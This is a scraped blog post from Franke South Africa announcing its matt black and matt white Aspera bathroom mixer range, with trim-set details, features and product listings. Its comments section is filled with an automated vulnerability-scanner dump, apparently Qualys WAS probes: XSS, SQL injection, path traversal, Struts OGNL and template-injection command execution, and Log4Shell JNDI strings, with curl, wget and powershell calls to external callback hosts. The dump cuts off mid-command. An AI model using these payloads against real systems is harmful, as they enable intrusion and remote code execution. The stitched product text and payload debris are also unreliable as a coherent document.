Water Solutions Contact us Franke in South Africa
Returning Customer / New Customer
Log in Register
By creating an account on our website you will be able to shop faster, be up to date on an orders status, and keep track of the orders you have previously made.
Logo

News & Blog RSS

Search store Search
Blog categories Blog categories
Hotels (2) Projects (1) Markets (3) All Posts

FRANKE’S MUCH ANTICIPATED RANGE OF COLOURED BATHROOM MIXERS

Introducing total versality to your bathroom design with Franke’s brand new Matt Black & Matt White Aspera Range.

The already popular straight edged chrome finish Aspera Range is now expanded to include colour finishes, complete with additional trim sets to customise the mixers detailing!

This colour range perfectly compliment the edgy & contemporary bathroom, with a choice of Matt White for a luxurious crisp all-white look or Matt Black for a trendy and dramatic monochrome design.

 

MORE ABOUT TRIM SETS:

Trim sets are essentially trim detail on the body construction of the bathroom mixer, made up of an aerator cover and domed cap cover. This unique feature of including additional trim sets with each mixer, allow the homeowner or designer the option to easily customise these mixers. The homeowner can also change the trim at a later stage as trends change – and what’s best – the homeowner can do it themselves in a few minutes!

The Matt Black Aspera Mixers come fitted standard in all over Matt Black. Included in the box are two additional trim sets. One set in Chrome, and one set in Rose Gold.

The Matt White Mixers come fitted standard a contrast Chrome trim. Included in the box is one additional trim set in Matt White for an all-over monochromatic look.

trim banner

 

PRODUCT FEATURES:

  • Superior high quality DZR Brass construction for an extended product lifespan.
  • Precision Engineering component detail for a durable, quality product.
  • Matt Finish Durable powder coating finish
  • Anti-scald Cartridge - engineered to mix hot and cold water efficiently and include an adjustable ring allowing you to limit the maximum temperature.
  • Neoperl easy-clean aerator to prevents clogging and provide an extended lifespan for the mixer, maintaining a perfect stream under any condition.
  • Functional and Aesthetically designed.
  • 5 Year Warranty on the body construction and 2 Year Warranty on the mixer cartridge.

 

When designing a bathroom, the number one goal is to provide excellent functionality. Ultimately the users of the bathroom need the space to be functional and serve their particular needs well, their it be a bathroom for family use, a guest bathroom or a master en-suite. In addition, a completed bathroom should look stylish and add to the overall value of the home.  

Choosing quality brassware is a key element to the success of any bathroom renovation. Fittings should be a good enough quality withstand the wear and tear of daily use. The right tap can also elevate and change the entire look of your bathroom whether in a full-scale renovation or a quick bathroom update.

 

Download a Brochure: ws-zabathroomcatalogCOL-01-01index.pdf (franke.com)

 

If you’d like to learn more about this recently launched range, please get in touch with your nearest sanitaryware retailer or visit www.ws.franke.co.za for more info.      

Products related with this blog post

ASPERA - HIGHRISE BASIN M/WH
2150038
AddToCompareList
Aspera Basin Mixer Matt White
2150037
AddToCompareList
Aspera Concealed Shower Mixer Matt White
2150040
AddToCompareList
Aspera Concealed Shower Mixer Matt White
2150039
AddToCompareList
Aspera Concealed Diverter Shower Mixer Matt Black
2150035
AddToCompareList
ASPERA CONCEALED SHOWER MIXER MATT BLACK
2150036
AddToCompareList

Leave your comment

Comments

"'><qss a=X2963108488Y2_2Z> ' onEvent=X2963108488Y2_2Z " onEvent=X2963108488Y2_2Z javascript:qxss(X2963108488Y2_2Z); "><qssdt4QlMKY> "'><qssmcH2Pxhq> z--><qss2xAXbGhI> "'><qss5Y7pd92i `;!--=&{()}> <script>_q=random(X2963108488Y2_2Z)</script> <script>_q_q=random(Jhr7eDcE)</script> <script src=//localhost/jA7Bq3lDG> <script =">" SRC=//localhost/jv6KCylZp> <SCRIPT/QSSw12mGWCr SRC=//localhost/j> "'><<SCRIPT a=2>qssbgh8Ysgu=7;//<</SCRIPT> <IMG SRC=javascript:qssvwtVatt2=7> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss916XbfWL=7"> "><DIV STYLE="width:expression(qssApRLULNh=7)"> <STYLE type="text/css" a=3>BODY{background:url("javascript:qssHE3mo0Cn=7")}</STYLE> <EMBED SRC=//localhost/q9pO6NoIO.swf AllowScriptAccess=always></EMBED> "'><qss a=X2963108488Y2_2Z> ' onEvent=X2963108488Y2_2Z " onEvent=X2963108488Y2_2Z < script a=4>qssJoYr5ULz=7< /script> %3cscript z%3e_q(y)%3c/script%3e <script src=http://localhost/j q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA q Qualys_resp_hdr_injection: Vulnerable q Qualys_resp_hdr_injection: Vulnerable qualys<esi:comment text="" />was<!--esx-->esi ' ;-- # /* `` , ( 1e309 /../../../../../../../etc/passwd ../../../../../../../Windows/System32/drivers/etc/hosts php://filter/read=string.rot13/resource=/etc/passwd ....//....//....//....//....//....//etc/passwd %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} a(){}phpinfo(); function a |netstat -an http://rfitest/ javascript:qxss(X2963108488Y2_2Z); ";(function(){qxsskwB4x58N});/**/" ");(function(){qxss50EAzGL5});/**/" qualys(aqxssG5n0Oe7E)xyz ';(function(){qxsseG27W7Vp});/**/' 9;(function(){qxss9CdMnOpm});// 9 ;(function(){qxssb18En5j5});// */;(function(){qxssZNY0j0QD});/* '-qxss3Wqjxb5J()-' "-qxss449byvyV()-" |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %> {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} ;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */ (23.0231*213.759) <!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" --> </script><script>function(){qxss7qo7UQc5};</script> http://169.254.169.254/latest/meta-data/ Joe+ bcc:was_engine@1c4fb8864833ad34656ee32e8f090952d03ba8c3.15933365147370345.37838498.smtphi01.smtp.eu1.qualysperiscope.com. http://804c570191f07c846201fdcb08baf7374c448b8c.15933365147370345.54787102.ssrf01.ssrf.eu1.qualysperiscope.com. ping -c 2 004812b4f9617b7ad624db616a42048b8ff98df0.15933365147370345.2373318473.oscomm01.oscomm.eu1.qualysperiscope.com. ${jndi:ldap://3e63a5270fd386e90b0735d2a68ae8b08426aeb7.15933365147370345.3321059281.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS} ${jndi:rmi://5507e9a3aa8a35c137553c007c2239996cb773e0.15933365147370345.2073124017.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS} ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://be7c594ada19721a40c7c70846a2927013c7a336.15933365147370345.702136157.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://2e21a9f13b1303bc78b4c5215a8c81ca92d503af.15933365147370345.1028059897.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS} ${j${::-n}di:ldap${::-:}//34be6c56b4ef03926bca05164526dfced6909db3.15933365147370345.698875353.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS} ${jnd${123%ff:-${123%ff:-i:}}ldap://438a0738604505a1291ac2e9c022792dd18338bd.15933365147370345.690213348.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS} ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//b381b7df7523b0c8a0d510f517264ccd0e73c823.15933365147370345.2661337719.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS} ${jndi:dns://0d5c8590690f4b00a96e595269a31d7bac6d149a.15933365147370345.1946793884.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS} ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//8f6a48707dad592a5099b5c1051a3789cacecd21.15933365147370345.2029801707.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS} ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://e4772ebbe6f39c5fc12ea4f3ff8c17395d35c368.15933365147370345.1990620895.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://ee4a87eb73049685b5c7d5553cc7dc46393b0418.15933365147370345.1486563634.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://4c265d64edf4e7873ef39c4c274f1f4c35276ad9.15933365147370345.1247148424.oscomm02.oscomm.eu1.qualysperiscope.com.')} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')} ${dns:address|6a511b164e8e85cfda1cccc3b923732da2d4d133.15933365147370345.732678284.oscomm04.oscomm.eu1.qualysperiscope.com.} $%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D ${url:UTF-8:http://181cb104e6d57dd7c943c46cb7d098bb6fe382c9.15933365147370345.1793564669.oscomm06.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:https://83a9e1d512fdc24b8317d0577007b911c46bc98d.15933365147370345.4291366179.oscomm07.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@} ${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@} ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://bee458252c5df79a403165537cfe9f6d8b1b832e.15933365147370345.3305865936.oscomm10.oscomm.eu1.qualysperiscope.com.')} powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@ ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://61e27451a62db0ea898d3b8da854cbe6cdfb6954.15933365147370345.3575437068.oscomm12.oscomm.eu1.qualysperiscope.com.')} powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@ ${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://1edd25248b6b1eaa624df0edcaab0b9f4f21646f.15933365147370345.1510137048.oscomm14.oscomm.eu1.qualysperiscope.com.')} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')} ${url:UTF-8::https://c6ba1ae10b70d6d9537994c6e728ad3bdacab767.15933365147370345.2867733362.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas} ${url:UTF-8::https://d892b1052432dc5ed7ac34623d8920c301f14947.15933365147370345.412342376.oscomm17.oscomm.eu1.qualysperiscope.com./} ${url:UTF-8:http://a022ebcebcf4caf44d6ea783c83afabfe4a56630.15933365147370345.726362941.oscomm18.oscomm.eu1.qualysperiscope.com./} ${url:UTF-8:https://596d0e35cfb5eaa4b865c150ed6aaf9c8db5b0f4.15933365147370345.3989244610.oscomm19.oscomm.eu1.qualysperiscope.com./} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://253830636516dd9b8e8d24a8f93ff8d9cbdf6419.15933365147370345.2250797475.oscomm20.oscomm.eu1.qualysperiscope.com.')} ${dns:address|5ca1ce442edfa83c6a41b47758ce53f2bb862cbd.15933365147370345.390963016.oscomm21.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:http://b9bff0dc7fff588aaf6e9df5b8331b7871bb0cb8.15933365147370345.4019926334.oscomm22.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:https://e495b2f9352ebba64ff9c9a0a93df15e2e5054c3.15933365147370345.1693519268.oscomm23.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8::http://1be7ca2d84848e3d2af89c5bfd4f15129b2ea370.15933365147370345.723089875.oscomm24.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8::https://de61bc49655f2083a50818ea79146ce7854fc08d.15933365147370345.2424596500.oscomm25.oscomm.eu1.qualysperiscope.com./} ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://a33527763938f7a2da124216e0af17c67c5545e8.15933365147370345.1695450278.oscomm26.oscomm.eu1.qualysperiscope.com.')} ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://e130d8a9a990d567a724c7e82120a5af881281fb.15933365147370345.1317442617.oscomm27.oscomm.eu1.qualysperiscope.com.')} {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://0f3ad2426d48999ea66f200d78fa2562bece59f1.15933365147370345.383792352.oscomm15019101.oscomm.eu1.qualysperiscope.com.').read() }} "'<svg/onload=alert(81) a=X2963108488Y2_2Z> ' onfocus=alert(81) autofocus=true onEvent=X2963108488Y2_2Z " onfocus=alert(81) autofocus=true onEvent=X2963108488Y2_2Z javascript:alert(81);qxss(X2963108488Y2_2Z); "><script>alert(81)</script> "'><script>alert(81)</script> z--><script>alert(81)</script> <script>alert(81)</script> "'><<SCRIPT a=2>alert(81);//<</SCRIPT> <IMG SRC=x onerror=alert(81)> <svg/onload=alert(81)> "><svg/onload=alert(81)> "'<svg/onload=alert(81) a=X2963108488Y2_2Z> ' onfocus=alert(81) autofocus=true onEvent=X2963108488Y2_2Z " onfocus=alert(81) autofocus=true onEvent=X2963108488Y2_2Z < script a=4>alert(81)< /script> %3cscript z%3ealert(81)%3c/script%3e javascript:alert(81);qxss(X2963108488Y2_2Z); ";alert(81);// ");alert(81);// ';alert(81);// 9;alert(81);// 9 ;alert(81);// */;alert(81);/* "*qxssl969v9Ix()*" '*qxssCy4NTMdn()*' '"/></script><script>function(){qxsswu5RQqMX};</script> ') or 2634=2634 -- ') and 2634=1123 -- ') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124 ') /* or __Q_1__ */aND 2634=1511 + 1124 -- oR 1123 ') /* or __Q_2__ */Or NULL IS NULL-- AnD 5867 ') /* or __Q_2__ */AnD 5867 IS NULL-- Or NULL ' or 3789=3789 -- ' and 3789=1391 -- ' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390 ' /* or __Q_1__ */aND 3789=2398 + 1390 -- oR 1391 ' /* or __Q_2__ */Or NULL IS NULL-- AnD 7643 ' /* or __Q_2__ */AnD 7643 IS NULL-- Or or 4325=4325 -- and 4325=2728 -- /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729 /* or __Q_1__ */aND 4325=1597 + 2729 -- oR 2728 /* or __Q_2__ */Or NULL IS NULL -- AnD 3251 /* or __Q_2__ */AnD 3251 IS NULL -- Or or NULL IS NULL or 6248 IS NULL oR 6248=2491 + 3757 oR 6248=2491 + 3756 Or 6248=6248 Or 6248=3757 and NULL IS NULL and 7248 IS NULL aND 7248=2491 + 4757 aND 7248=2491 + 4756 AnD 7248=7248 AnD 7248=4757 ') or 'swqtp'='swqtp ') and 'swqtp'='ptqws ') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws ') /* or __Q_1__ */aND ' oR tyhjg'=' aND tyhgd ') /* or __Q_2__ */Or ' AnD aghjk'LIKE' AnD aghjk ') /* or __Q_2__ */AnD ' Or aghjk'LIKE' AnD jlgdf ' or 'tpklq'='tpklq ' and 'tpklq'='xqlkp ' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp ' /* or __Q_1__ */aND ' oR mktrs'=' aND ljhgy ' /* or __Q_2__ */Or ' AnD mjnfg'LIKE' AnD mjnfg ' /* or __Q_2__ */AnD ' Or mjnfg'LIKE' AnD fhdgr 1 or 11=11 1 or 11=12 5 oR 9=8 + 1 5 oR 9=9 + 1 6 Or 9=9 6 Or 9=8 ' or true() or 'and' = 'and ' and false() and 'or' = 'and ' or not(false()) or 'true' = 'true ' and not(true()) or 'false' = 'true ' or boolean(string-length('and')) or 'and' = 'and ' and boolean(string-length('')) and 'or' = 'and or true() or 'and' = 'and' and false() and 'or' = 'and' or not(false()) or 'true' = 'true' and not(true()) or 'false' = 'true' or boolean(string-length('and')) or 'and' = 'and' and boolean(string-length('')) and 'or' = 'and' " or true() or "and" = "and " and false() and "or" = "and " or not(false()) or "true" = "true " and not(true()) or "false" = "true " or boolean(string-length("and")) or "and" = "and " and boolean(string-length("")) and "or" = "and aaaa&ping -n 92 localhost& ping -c2 -i91 localhost |ping -c2 -i91 localhost |ping -c2 -i91 localhost| WAITFOR DELAY '00:00:29' ;WAITFOR DELAY '00:00:29'; );WAITFOR DELAY '00:00:29'-- ';WAITFOR DELAY '00:00:29'-- ');WAITFOR DELAY '00:00:29'-- ',0,0);WAITFOR DELAY'00:00:29'-- + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) ' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ' ;SELECT sleep(29); -- (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/ '; var djci=sleep(29*1000);// '; var djci=sleep(29*1000) + ' ' + sleep(29*100*Math.sqrt(100)) + ' (#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)) "'><qss a=X2960462084Y2_2Z> ' onEvent=X2960462084Y2_2Z " onEvent=X2960462084Y2_2Z javascript:qxss(X2960462084Y2_2Z); "><qss6jtypF59> "'><qss99Qgli2B> z--><qsst25NZmWl> "'><qssNTu8cuDu `;!--=&{()}> <script>_q=random(X2960462084Y2_2Z)</script> <script>_q_q=random(f0U2h4ix)</script> <script src=//localhost/jO6k6q7m7> <script =">" SRC=//localhost/j3EpAfJ1r> <SCRIPT/QSSQ705hrn7 SRC=//localhost/j> "'><<SCRIPT a=2>qssAE1xqj5e=7;//<</SCRIPT> <IMG SRC=javascript:qssuSry3Yx7=7> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss0jX6YcaJ=7"> "><DIV STYLE="width:expression(qssOu6aj6QP=7)"> <STYLE type="text/css" a=3>BODY{background:url("javascript:qssU0f238rD=7")}</STYLE> <EMBED SRC=//localhost/qh939Jd85.swf AllowScriptAccess=always></EMBED> "'><qss a=X2960462084Y2_2Z> ' onEvent=X2960462084Y2_2Z " onEvent=X2960462084Y2_2Z < script a=4>qss9Z99be5p=7< /script> %3cscript z%3e_q(y)%3c/script%3e <script src=http://localhost/j q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA q Qualys_resp_hdr_injection: Vulnerable q Qualys_resp_hdr_injection: Vulnerable qualys<esi:comment text="" />was<!--esx-->esi ' ;-- # /* `` , ( 1e309 /../../../../../../../etc/passwd ../../../../../../../Windows/System32/drivers/etc/hosts php://filter/read=string.rot13/resource=/etc/passwd ....//....//....//....//....//....//etc/passwd %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} a(){}phpinfo(); function a |netstat -an http://rfitest/ javascript:qxss(X2960462084Y2_2Z); ";(function(){qxss4280e61F});/**/" ");(function(){qxssuyavwBYT});/**/" qualys(aqxssl8wLe1Zn)xyz ';(function(){qxssWa9z4sK8});/**/' 9;(function(){qxssoa59tTz1});// 9 ;(function(){qxss6Sd4jPSs});// */;(function(){qxssxMA2Q94H});/* '-qxss3bYd475m()-' "-qxssL2AMg10U()-" |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %> {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} ;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */ (23.0231*213.759) <!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" --> </script><script>function(){qxssH38N6P92};</script> http://169.254.169.254/latest/meta-data/ Joe+ bcc:was_engine@efa6e5b1b073127d1465417b0d3bdac9b26fd50d.16312645147370345.2517507498.smtphi01.smtp.eu1.qualysperiscope.com. http://ea5dceaca44a2df564903db59483dcdcfb52df4e.16312645147370345.2685576954.ssrf01.ssrf.eu1.qualysperiscope.com. ping -c 2 1ea011452207830c39a4ff4ea9b674fec0247980.16312645147370345.1328816946.oscomm01.oscomm.eu1.qualysperiscope.com. ${jndi:ldap://42bec2b252bc72833970fe2858bee3c28d8b96a2.16312645147370345.951429162.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS} ${jndi:rmi://d36bd3e7dc973f7613a0666dc5b35e075aeffef0.16312645147370345.1062835960.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS} ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://ba783d8bdd291f10817dad1075adfe7184c26037.16312645147370345.2535954637.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://85bf5dfbaf9016efdd19e8223665cca94997af10.16312645147370345.2658565728.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS} ${j${::-n}di:ldap${::-:}//bdfc234ece53450e5446c6e7f49f35a52263e19e.16312645147370345.2517233618.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS} ${jnd${123%ff:-${123%ff:-i:}}ldap://998b6aea59e14052d829081cefe187b3e9830d26.16312645147370345.1627224020.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS} ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//5dba162d3c4a94497c6f7352c5b1d5ca251f206e.16312645147370345.2168308991.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS} ${jndi:dns://6063071ca35f444ce791b37750d54eaaec264fcb.16312645147370345.1422778402.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS} ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//251dee4dd7f55ebb8053e1bf3ae5a20e9aa33cb2.16312645147370345.1605843111.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS} ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://37c9f1fb9aae533035b69089262dcf1fb25c2a3a.16312645147370345.2824580020.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://c5171d0cdb94cb980c46382f26667d0f0e0bbd42.16312645147370345.1655896366.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://6ba6ed8b2c2a0e3c5a6f2960d23bfc5677a81e3a.16312645147370345.1944803862.oscomm02.oscomm.eu1.qualysperiscope.com.')} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')} ${dns:address|be5f73ab4ddc28d4662cecb964e1952ddd38e48e.16312645147370345.70015185.oscomm04.oscomm.eu1.qualysperiscope.com.} $%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D ${url:UTF-8:http://a0d5aff7edd7b4f98703eb9cc62bc5ef82760e00.16312645147370345.2965714065.oscomm06.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:https://4523836728daef675493dee9fb0496fb2cc59394.16312645147370345.3872423364.oscomm07.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@} ${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@} ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://7d408962d4238b48e3c521092c44f65e9374440a.16312645147370345.4005487501.oscomm10.oscomm.eu1.qualysperiscope.com.')} powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@ ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://f46b21c7dab24d2bbf1faf4aaf42416b6e8998c6.16312645147370345.1024470769.oscomm12.oscomm.eu1.qualysperiscope.com.')} powershell -c 